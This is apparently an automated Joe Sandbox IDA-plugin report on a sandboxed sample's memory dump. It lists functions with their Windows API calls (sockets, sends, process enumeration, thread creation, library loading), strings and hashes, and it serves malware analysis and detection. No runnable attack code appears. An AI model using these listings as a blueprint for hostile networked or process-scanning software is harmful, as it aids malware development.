zz45495*&*%d%d%d, xrefs: 1001BDB5

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _sprintf$H_prolog
String ID: %s%d%d%d$zz45495*&*%d%d%d
API String ID: 259905005-2271766065
Opcode ID: 1868276e222430b0711a32a24c337b96d9a80714155d2067a2ff2d2d06dfe0d6
Instruction ID: f1d4c3c9667547648429a607cca681a9e57cf3c8f04ea2054e519e06e169c46a
Opcode Fuzzy Hash: 1868276e222430b0711a32a24c337b96d9a80714155d2067a2ff2d2d06dfe0d6
Instruction Fuzzy Hash: 24316D76C00648BFDB02DFE8C8419DEB7B9EF19300F408466FA15B7052DB71AA09CBA1

Function 10017A82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10017A87
_wprintf.LIBCMT ref: 10017AB4

Strings

Error (%s) in line: %d in file: %s, xrefs: 10017AAF
property.length() > 0 && value.length() > 0, xrefs: 10017AAA
inc\http\HttpConnection.cpp, xrefs: 10017AA3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_wprintf
String ID: Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$property.length() > 0 && value.length() > 0
API String ID: 2247797838-1198884184
Opcode ID: 371f25e065dc004a750377dc6d8794cbd2b88cbe2486646344ded18cddad5460
Instruction ID: 8e15a67093e9226085e99b1e866dbffcfd67afb35c3a21f603de68190b18a0af
Opcode Fuzzy Hash: 371f25e065dc004a750377dc6d8794cbd2b88cbe2486646344ded18cddad5460
Instruction Fuzzy Hash: 0501F9355000047BE701EA04CC12FFE736DDF907A0F40022BB915971D6CFB8AB4682A6

Function 10036992 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 100369AC
GetProcAddress.KERNEL32(00000000), ref: 100369B3
EncodePointer.KERNEL32(00000000), ref: 100369BF
DecodePointer.KERNEL32(00000001), ref: 100369DC

Strings

combase.dll, xrefs: 100369A7
RoInitialize, xrefs: 1003699B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 1131baf758f969b5486045358364ea536160914facfa0b82cba98193dee1e59f
Instruction ID: 5f4c3249436c78f0982b856506d81eda569677dcd8857e6d54f84e6395c525f4
Opcode Fuzzy Hash: 1131baf758f969b5486045358364ea536160914facfa0b82cba98193dee1e59f
Instruction Fuzzy Hash: 34E01738690261AAFB116BB0CC8CF993AA9F704B4BF11E120F205D90E0EBB044489F01

Function 10027310 Relevance: 7.8, APIs: 5, Instructions: 328windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100273D1
GetCurrentThreadId.KERNEL32 ref: 1002756D
CreateThread.KERNEL32(00000000,00000000,1002F0F0,?,00000000,00000000), ref: 10027597
Sleep.KERNEL32(0000000A,?,?,?,?,93656AD3,?,00000000,?), ref: 100275AE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100275BE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: MessageThread$CreateCurrentSleep_memmove
String ID:
API String ID: 3715655313-0
Opcode ID: 932e180da84364583c5f899cf78d1e37845a735c11b60457a92f8378c03e2deb
Instruction ID: 20035363636fbff4d5577a0cf27411d17544e9d07305abe0b436cc653ffae869
Opcode Fuzzy Hash: 932e180da84364583c5f899cf78d1e37845a735c11b60457a92f8378c03e2deb
Instruction Fuzzy Hash: 69C1AC31A002559FDB01DFA8CC55BAEBFB1FB05310FD44269E80A6B6D2CBB5AD41CB91

Function 1004A373 Relevance: 7.8, APIs: 5, Instructions: 259COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

__invoke_watson.LIBCMT ref: 1004A58B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd_noexit__invoke_watson
String ID:
API String ID: 175857852-0
Opcode ID: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
Instruction ID: 1d3f45d9d31e3010abf2b66f438840b9e2b7bc4b933bb305e85ec94c22506c0b
Opcode Fuzzy Hash: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
Instruction Fuzzy Hash: 1971F5765006129EEB15DB24CC86B6B77ECEF82351F2480B9FD05DA086FB74EE848764

Function 10026910 Relevance: 7.6, APIs: 6, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 10026961
LeaveCriticalSection.KERNEL32(?), ref: 100269C0
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A19
EnterCriticalSection.KERNEL32(?,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A2B
LeaveCriticalSection.KERNEL32(?), ref: 10026A6A
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026AA2

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeave
String ID:
API String ID: 3296397286-0
Opcode ID: 2be9ed52d4ef0489d305100fcdcedbd2f48dc47cfc3401de3809552b2046b69d
Instruction ID: 69b54cbec9c2a2cf239ea5cb71a4ebdbed0f90427bed276832e92f5eea82da01
Opcode Fuzzy Hash: 2be9ed52d4ef0489d305100fcdcedbd2f48dc47cfc3401de3809552b2046b69d
Instruction Fuzzy Hash: D9417975900215EFDB01CF58ED84BDABBF8FF48350F54826AEC19AB295DB316844CBA0

Function 10024410 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 1002446C
EnterCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024482
LeaveCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024491

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID:
API String ID: 3376869089-0
Opcode ID: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
Instruction ID: e1103fb16bcf34c27b6bba3f82fa35d23c377cf532448162990da8c687367291
Opcode Fuzzy Hash: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
Instruction Fuzzy Hash: 1531CF72A04B65EFD701CF84E885B99F7F8FB04725F91422AF90993680CB75AD50CBA0

Function 1001FDD0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 1001F470: HeapFree.KERNEL32(?,00000000,?), ref: 1001F4C4

EnterCriticalSection.KERNEL32(?,93656AD3,?,?,?,?,00000000,10050D58,000000FF), ref: 10026C92
_free.LIBCMT ref: 10026CA7

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

ResetEvent.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026CD0
ResetEvent.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026CD8
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026D62

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalEventFreeHeapResetSection$EnterErrorLastLeave_free
String ID:
API String ID: 813198115-0
Opcode ID: 121b09cc14e230c83955a259428a73d89a7680d91248fd021a20475fc6d8366c
Instruction ID: 04441b3ce9a095c04100b976fa77d271efc0422afdafd5dc7e5adaf5cc78714d
Opcode Fuzzy Hash: 121b09cc14e230c83955a259428a73d89a7680d91248fd021a20475fc6d8366c
Instruction Fuzzy Hash: DD316D75600244DFDB45DF28C898B9ABBF4FF49324F5081AAE8188F296DB75A804CF90

Function 100246A0 Relevance: 7.6, APIs: 5, Instructions: 91networkmemoryCOMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,?), ref: 10024718
WSASend.WS2_32(1002383D,?,00000001,?,00000000,?,00000000), ref: 10024748
WSAGetLastError.WS2_32 ref: 10024753
InterlockedDecrement.KERNEL32(00000002), ref: 10024763
HeapFree.KERNEL32(?,00000000,?,?), ref: 10024793

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
String ID:
API String ID: 930714758-0
Opcode ID: 1972da9f65ab38ca626a1e8a79e267d2f0406b4080d14df9bbeb91a1dbdcfa2f
Instruction ID: c9feec93b76c13933b9d7088ce872dbd55c535b4e7aa2b00c7f86bf33a32e45e
Opcode Fuzzy Hash: 1972da9f65ab38ca626a1e8a79e267d2f0406b4080d14df9bbeb91a1dbdcfa2f
Instruction Fuzzy Hash: 1231BE761013109FE760CF25E888B9677F8FF09340F828669ED598B295DB71E804CFA0

Function 1000D8B2 Relevance: 7.6, APIs: 5, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,75923050,?,10005B95,?,?,?,10005AD4), ref: 1000D8C7
_free.LIBCMT ref: 1000D8DA
_free.LIBCMT ref: 1000D8F1
_free.LIBCMT ref: 1000D908
_free.LIBCMT ref: 1000D91F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$CloseHandle
String ID:
API String ID: 1525775657-0
Opcode ID: 1b246619cf74dc254d483b4a0201465356ea0d2d7e34e570287148875704c418
Instruction ID: 38b56e7584fb66d25564bdbf6a4c7f13ba84eb432b6331f33e900c25f280b608
Opcode Fuzzy Hash: 1b246619cf74dc254d483b4a0201465356ea0d2d7e34e570287148875704c418
Instruction Fuzzy Hash: 9F31E934111B019BE324EB35D895BEAF3E4EF54381F418D2EE0AB8A156DF70BA85CA50

Function 10010F04 Relevance: 7.6, APIs: 5, Instructions: 84processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10010F09

Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 10010F6E
Process32First.KERNEL32(00000000,?), ref: 10010F8C
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10010FD2
Process32Next.KERNEL32(00000000,00000128), ref: 10011011

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prologProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3748986744-0
Opcode ID: 5270075dfac5b8a49d61a256878c69d8e1ea876c9273c87fc0bc4189ec04c9c8
Instruction ID: 78b35f7e6756fe4e50e7ea57a4b403130daab9a31b4eaec1afd9b11dc3a3f1df
Opcode Fuzzy Hash: 5270075dfac5b8a49d61a256878c69d8e1ea876c9273c87fc0bc4189ec04c9c8
Instruction Fuzzy Hash: A631C175D01219EFEB10DFA4CC91AEEB7B8EF05390F008029F515A6191DB78AB85CF61

Function 100236A0 Relevance: 7.6, APIs: 5, Instructions: 83networkmemoryCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 100236C3
WSAGetLastError.WS2_32 ref: 10023720
closesocket.WS2_32(?), ref: 10023749
HeapFree.KERNEL32(00000000,00000000,?,?), ref: 10023769
InterlockedDecrement.KERNEL32(?), ref: 10023776

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: DecrementErrorFreeHeapInterlockedLastclosesocketsocket
String ID:
API String ID: 754258639-0
Opcode ID: d441c2c743485f14048e4bd0b3a966edf42c9b5aa2b40ee60db7e82fef7b3bdd
Instruction ID: e68d2a3abb1c95569ddef35404d751f8cd0bdbb6a0eb3d6bf00160ed96876589
Opcode Fuzzy Hash: d441c2c743485f14048e4bd0b3a966edf42c9b5aa2b40ee60db7e82fef7b3bdd
Instruction Fuzzy Hash: C7215CB560021AEFEB14DFA9D8C5AAABBB9FF08240F408069F905D7250DB71ED549B90

Function 10023790 Relevance: 7.6, APIs: 5, Instructions: 82networkthreadCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 100237B3
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 100237E8
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 10023816
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00000000), ref: 10023820
GetCurrentThreadId.KERNEL32 ref: 10023844

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$CompletionCurrentOverlappedQueuedResultStatusThread
String ID:
API String ID: 1563818880-0
Opcode ID: 012cc377695a579ce0bd0f3af0e9d1dca6484571d372545beed0980e8a3ef0c7
Instruction ID: b9f087724994e0516a15b4b33f3d58088258f4b915a02b4dceb28d6e58c93e85
Opcode Fuzzy Hash: 012cc377695a579ce0bd0f3af0e9d1dca6484571d372545beed0980e8a3ef0c7
Instruction Fuzzy Hash: FE216BB5A00219FFDF11CFA4D8849AEBBB8FF48290F40855AF916D7250DB30AA04DB91

Function 10026AC0 Relevance: 7.6, APIs: 5, Instructions: 75networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000001,?,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026AE1
send.WS2_32(?,?,?,00000000), ref: 10026AFE
LeaveCriticalSection.KERNEL32(?,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B11
SetLastError.KERNEL32(00000000,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B1D
WSAGetLastError.WS2_32(?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B6B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeavesend
String ID:
API String ID: 421069059-0
Opcode ID: 25a34f9671bf7da85fe1546c299b962e5dac4595aaec4376653f16ab33c01647
Instruction ID: 196f02ec29e4ada0d307ae28afdeaf4269b163a7df2c7b5fa27b3b824c8cc6d7
Opcode Fuzzy Hash: 25a34f9671bf7da85fe1546c299b962e5dac4595aaec4376653f16ab33c01647
Instruction Fuzzy Hash: F0219036200605AFD705CF68D9D8A9A7BB5FF88360F108169EC09CB291DB30F991CBA0

Function 10034365 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10034371

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_free.LIBCMT ref: 10034384

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
Instruction ID: bb9a3691e4910ddf3f97fd95c6fed46118ceeaa6e102d9eb0dcd454a9ff698ef
Opcode Fuzzy Hash: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
Instruction Fuzzy Hash: 2011A739905626EFDB23EF749C4564A77D4FF002A3F128535F9489F151DF70A9408A90

Function 1003688A Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 100368B4
CreateThread.KERNEL32(7591E010,?,100369EA,00000000,?,10023790), ref: 100368F8
GetLastError.KERNEL32(?,?,00000000,?,10022663,00000000,00000000,10023790,?,00000000,00000000,?,7591E010), ref: 10036902
_free.LIBCMT ref: 1003690B
